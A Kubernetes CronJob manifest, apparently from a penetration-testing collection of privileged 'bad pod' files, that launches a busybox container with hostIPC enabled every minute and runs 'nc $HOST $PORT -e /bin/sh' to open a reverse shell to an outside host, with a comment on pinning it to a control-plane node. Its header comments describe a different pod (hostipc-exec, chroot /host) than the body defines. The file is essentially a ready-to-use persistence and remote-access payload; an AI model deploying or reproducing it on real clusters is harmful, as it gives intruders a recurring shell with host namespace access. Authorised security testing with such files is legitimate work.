###########################################################
## Deploy: kubectl -n [namespace] apply -f hostipc-exec.yaml 
## Access: kubectl -n [namespace] exec -it hostipc-exec -- chroot /host
## Remove: kubectl -n [namespace] delete hostipc-exec
###########################################################

apiVersion: batch/v1beta1
kind: CronJob
metadata:
  name: hostipc-revshell-cronjob
  labels:
    app: pentest
spec:
  schedule: "*/1 * * * *"
  concurrencyPolicy: Forbid
  jobTemplate:
    spec:
      template:
        spec:
          hostIPC: true
          containers:
          - name: hostipc-revshell-cronjob
            image: busybox
            command: [ "/bin/sh", "-c", "--" ]
            args: [ "nc $HOST $PORT  -e /bin/sh;" ]
          #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name
          restartPolicy: OnFailure

